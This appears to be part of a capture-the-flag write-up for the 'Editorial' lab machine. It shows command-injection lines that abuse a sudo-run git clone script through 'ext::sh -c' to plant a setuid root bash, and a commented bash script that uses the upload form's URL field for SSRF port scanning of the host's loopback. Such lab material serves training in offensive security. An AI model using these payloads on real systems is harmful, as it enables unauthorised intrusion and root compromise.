Editorial
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash'"
ext::sh -c "cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"
ext::sh -c 'cp /bin/bash /tmp/rootbash&&chmod+4755+/tmp/rootbash'
python3 clone_prod_change.py "ext::sh -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'"
#!/bin/bash
# Probes which TCP ports on the target's own loopback interface answer, by
# submitting "http://localhost:<port>" as the `bookurl` field of the
# /upload-cover form and recording the HTTP status the application returns for
# each port. One POST is sent per port, so a full run is 65535 requests to the
# same endpoint from the same client -- a pattern that is easy to pick out in
# the web server's access logs (same path, same User-Agent, sequential bursts).
# On the application side the remedy is to validate `bookurl` against an
# allow-list and refuse loopback, link-local and private destinations before
# performing the server-side fetch.
# Target host
TARGET_HOST="editorial.htb"
UPLOAD_ENDPOINT="http://$TARGET_HOST/upload-cover"
# Headers for the request
USER_AGENT="Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
# The boundary announced in the Content-Type header and the delimiter written
# into the body below are maintained as two separate literals (the body
# delimiter is "--" + the header boundary); nothing derives one from the other,
# so they have to be kept in step by hand.
CONTENT_TYPE="multipart/form-data; boundary=---------------------------396747637542515860132877623504"
BOUNDARY="-----------------------------396747637542515860132877623504"
# Loop through all ports from 1 to 65535
for PORT in {1..65535}
do
echo "[*] Testing port $PORT"
# Construct the POST data
# NOTE: this is a plain double-quoted bash string. The trailing backslashes act
# as line continuations (the newline is dropped), and the `\r\n` sequences are
# NOT translated -- they stay as the literal characters backslash, r,
# backslash, n. The body on the wire is therefore one line with literal "\r\n"
# text between the multipart parts, which is what to look for when matching
# these requests in captured traffic.
POST_DATA="\
$BOUNDARY\r\n\
Content-Disposition: form-data; name=\"bookurl\"\r\n\r\n\
http://localhost:$PORT\r\n\
$BOUNDARY\r\n\
Content-Disposition: form-data; name=\"bookfile\"; filename=\"\"\r\n\
Content-Type: application/octet-stream\r\n\r\n\
$BOUNDARY--\r\n"
# Make the POST request using curl
# Only the status code is kept (-o /dev/null discards the body, -w prints
# %{http_code}). If curl cannot reach the target at all, %{http_code} is "000",
# which the check below also treats as a possible service -- so a network
# hiccup on the scanner's side produces false positives rather than an error.
RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$UPLOAD_ENDPOINT" \
-H "Host: $TARGET_HOST" \
-H "User-Agent: $USER_AGENT" \
-H "Accept: */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://$TARGET_HOST/upload" \
-H "Content-Type: $CONTENT_TYPE" \
-H "Origin: http://$TARGET_HOST" \
-H "DNT: 1" \
-H "Connection: close" \
-H "Sec-GPC: 1" \
--data-binary "$POST_DATA")
# Check if response is not 404 or 500
# Every status other than 404/500 is reported. The two excluded codes are
# presumably what the application answers when its server-side fetch of
# `bookurl` fails -- confirm against the target before relying on that.
if [[ "$RESPONSE" != "404" && "$RESPONSE" != "500" ]]; then
echo "[+] Possible active service on port $PORT (HTTP Status: $RESPONSE)"
fi
done
echo "[*] Scan completed."